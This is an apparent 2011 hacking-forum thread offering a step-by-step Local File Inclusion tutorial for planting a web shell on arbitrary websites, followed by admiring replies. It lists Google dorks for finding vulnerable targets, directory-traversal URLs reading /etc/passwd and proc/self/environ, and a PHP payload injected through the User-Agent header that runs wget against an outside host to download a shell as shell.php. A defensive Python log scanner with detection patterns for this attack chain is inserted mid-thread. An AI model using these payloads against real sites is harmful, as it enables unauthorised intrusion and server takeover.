Sinisterly
-=LFI TUTORIAL=- [ULTIMATE] - Printable Version



-=LFI TUTORIAL=- [ULTIMATE] - EVILKING - 10-06-2011

THERE ARE 6 PARTS TO THIS TUTORIAL:


1 – Introduction
2 – Finding LFI VULN. WEBSITE
3 – Checking if etc/passwd is accessible
4 – Checking if proc/self/environ is accessible
5 – Injecting malicious code
6 – Access our shell



LET'S BEGIN....

1 – Introduction

In this tutorial I show you how to upload a shell on websites using Local File Inclusion vulnerabilities and
injecting malicious code in proc/self/environ. It is a step-by-step tutorial.



2 – Finding LFI

- Now we are going to find a Local File Inclusion vulnerable website. So we found our target, let's check it.

FOR THAT I CAN PASTE HERE SOME GOOD GOOGLE DORK USING THAT YOU CAN FIND LFI VULNERABLE WEBSITES

PHP Code:
JUST PUT "inurl:.php?"  BEFORE ALL DORKS

acion=
act=
action=
API_HOME_DIR=
board=
cat=
client_id=
cmd=
cont=
contact=
current_frame=
date=
detail=
dir=
display=
download=
f=
file=
fileinclude=
filename=
firm_id=
g=
getdata=
go=
HT=
idd=
inc=
incfile=
incl=
include_file=
include_path=
infile=
info=
ir=
lang=
language=
link=
load=
main=
mainspot=
msg=
num=
openfile=
p=
page=
pagina=
path=
path_to_calendar=
pg=
plik
qry_str=
ruta=
safehtml=
section=
showfile=
side=
site_id=
skin=
static=
str=
strona=
sub=
tresc=
url=
user

YOU CAN FIND MANY WEBSITES BUT ALL ARE NOT LFI VULNERABLE ....SO DON'T BE ANGRY....
BE COOL


EXAMPLE I CAN FIND WEBSITE NAME:

PHP Code:
www.example.com/view.php?page=contact.php 

NOW WE ARE GOING TO CHECK IF IT IS LFI VULNERABLE OR NOT.....FOR THAT WE CAN REPLACE contact.php WITH ../ SO THE URL BECOMES


PHP Code:
www.example.com/view.php?page=../ 

AND WE GOT AN ERROR

PHP Code:
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

IF YOU GOT AN ERROR THEN IT IS LFI VULNERABLE ...AND IF YOU CAN NOT GET ERROR OR IF YOU GET BLANK PAGE THEN IT'S NOT LFI VULNERABLE...


3 - Now let's check for etc/passwd to see if it is Local File Inclusion vulnerable. Let's make a request:

PHP Code:
www.example.com/view.php?page=../../../etc/passwd 

we got error and no etc/passwd file

PHP Code:
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337


SO WE GO MORE DIRECTORIES UP


PHP Code:
www.example.com/view.php?page=../../../../../etc/passwd 

we successfully included the etc/passwd file.

PHP Code:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
test:x:13:30:test:/var/test:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin

THERE ARE ALSO GOOD DIRECTORIES THAT YOU CAN VISIT::

PHP Code:
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default 


4 – Checking if proc/self/environ is accessible

- Now let's see if proc/self/environ is accessible. We replace etc/passwd with proc/self/environ


PHP Code:
www.example.com/view.php?page=../../../../../proc/self/environ 

IF YOU GET SOMETHING LIKE THIS

PHP Code:
DOCUMENT_ROOT=/home/sirgod/public_html
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac
HTTP_HOST=www.website.com
HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd
HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00
PATH=/bin:/usr/bin
QUERY_STRING=view=../../../../../../proc/self/environ
REDIRECT_STATUS=200
REMOTE_ADDR=6x.1xx.4x.1xx
REMOTE_PORT=35665
REQUEST_METHOD=GET
REQUEST_URI=/index.php?view=../../../../../../proc/self/environ
SCRIPT_FILENAME=/home/sirgod/public_html/index.php
SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x
SERVER_ADMIN=webmaster@website.com
SERVER_NAME=www.website.com
SERVER_PORT=80
SERVER_PROTOCOL=HTTP/1.0
SERVER_SIGNATURE=Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.example.com Port 80

proc/self/environ is accessible. If you got a blank page or an error, proc/self/environ is not accessible

5 – Injecting malicious code

- Now let’s inject our malicious code in proc/self/environ. How can we do that? We can inject our code in the User-Agent HTTP header.
Use the Tamper Data add-on for Firefox to change the User-Agent. Start Tamper Data in Firefox and request the URL:



PHP Code:
www.example.com/view.php?page=../../../../../proc/self/environ 

Choose Tamper and in the User-Agent field write the following code: TAMPER DATA IS AN ADD-ON FOR MOZILLA FIREFOX ..JUST GOOGLE IT AND YOU WILL FIND IT...

PHP Code:
<?system(‘wget http://www.drivehq.com/web/username/your shellname.txt -O shell.php’);?>

EXAMPLE:
PHP Code:
<?system(‘wget http://abcxyz.0adz.com/WSO.txt -O shell.php’);?>


If it doesn’t work, try exec(), because system() can be disabled on the webserver from php.ini

HERE "http://www.drivehq.com/web/username/your shellname.txt" IS A LOCATION OF YOUR SHELL...WHICH YOU HAVE TO PUT IN TXT FILE..

IT IS NOT NECESSARY TO UPLOAD YOUR SHELL ON DRIVE HQ...

WHAT THIS CODE DOES IS UPLOAD YOUR TXT FILE TO THE LFI VULNERABLE WEBSITE AS shell.php


6 – Access our shell

- Now let's check if our malicious code was successfully injected. Let's check if the shell is present.


PHP Code:
www.example.com/shell.php 

OUR SHELL IS THERE, INJECTION IS SUCCESSFUL....
IF SHELL IS NOT THERE THEN TRY ANOTHER WEBSITE...

THANKS FOR READING....



-=EVILKING AN INDIAN HAXOR=-
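
How the sequence in the post above looks from the server side, as an added example that is not part of the original post: a Python pass over combined-format access logs that flags traversal runs, requests for /etc/passwd-style files or proc/self/environ, and PHP tags in User-Agent or Referer. The names classify and scan, the finding labels and the sample log lines are assumptions made for illustration, and it goes slightly beyond the post by also decoding nested percent-encoding.

```python
import re
from urllib.parse import unquote

# Apache/nginx "combined" access-log format (assumed for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+)[^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "(?P<agent>(?:[^"\\]|\\.)*)"'
)
TRAVERSAL = re.compile(r'(?:\.\.[/\\]){2,}')  # two or more ../ hops
SENSITIVE = re.compile(r'etc/(?:passwd|shadow|group)|proc/self/environ', re.I)
PHP_TAG = re.compile(r'<\?(?:php|=|\s*[a-z_]+\s*\()', re.I)

# Constructed log lines: documentation IP ranges, placeholder header value.
SAMPLE = [
    '198.51.100.20 - - [06/Oct/2011:10:00:00 +0000] "GET /view.php?page=contact.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [06/Oct/2011:10:00:05 +0000] "GET /view.php?page=../../../../../etc/passwd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [06/Oct/2011:10:00:09 +0000] "GET /view.php?page=%252e%252e%252f%252e%252e%252fproc/self/environ HTTP/1.1" 200 900 "-" "<?php /* constructed placeholder */ ?>"',
]

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (%252e%252e%252f -> ../) before matching."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(line):
    """Return (client_ip, findings) for one combined-format log line."""
    m = LOG_RE.match(line)
    if not m:
        return None, {"unparsed"}
    findings = set()
    target = fully_decode(m["target"])
    if TRAVERSAL.search(target):
        findings.add("traversal")
    if SENSITIVE.search(target):
        findings.add("sensitive-file")
    # Under CGI, request headers are copied into the process environment, so
    # PHP tags in User-Agent or Referer are the injection half of this chain.
    if PHP_TAG.search(m["agent"]) or PHP_TAG.search(m["referer"]):
        findings.add("php-in-header")
    return m["ip"], findings

def scan(lines):
    """Union findings per client IP so the probe-then-inject sequence stands out."""
    per_ip = {}
    for ip, found in map(classify, lines):
        if ip and found:
            per_ip.setdefault(ip, set()).update(found)
    return per_ip
```

A source that accumulates all three labels has walked the whole sequence; a 200 response to any of those requests means the include parameter is reaching the filesystem unfiltered and needs an allowlist of page names.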



RE: -=LFI TUTORIAL=- [ULTIMATE] - V1P3R - 10-08-2011

nice share
thanks for it


RE: -=LFI TUTORIAL=- [ULTIMATE] - Access2emma - 10-08-2011

Nice tutorial. Thanks for sharing


RE: -=LFI TUTORIAL=- [ULTIMATE] - indonesia21 - 10-13-2011

nice share brooo !!!
test now for me ..



RE: -=LFI TUTORIAL=- [ULTIMATE] - ghalib_awan - 10-13-2011

Nice tutorial man !!!!
screenshots would've helped greatly !!!!!
I am a newbie, gotta try this !!!!


RE: -=LFI TUTORIAL=- [ULTIMATE] - shadowtns - 10-22-2011

nice share man..thnxx a lot


RE: -=LFI TUTORIAL=- [ULTIMATE] - jacm - 10-31-2011

Very useful !
Thank you !!


RE: -=LFI TUTORIAL=- [ULTIMATE] - xononame - 10-31-2011

thx for this tutorial, helped a lot.....


RE: -=LFI TUTORIAL=- [ULTIMATE] - The Alchemist - 04-11-2012

great tutorial.... thanks for sharing...:-)

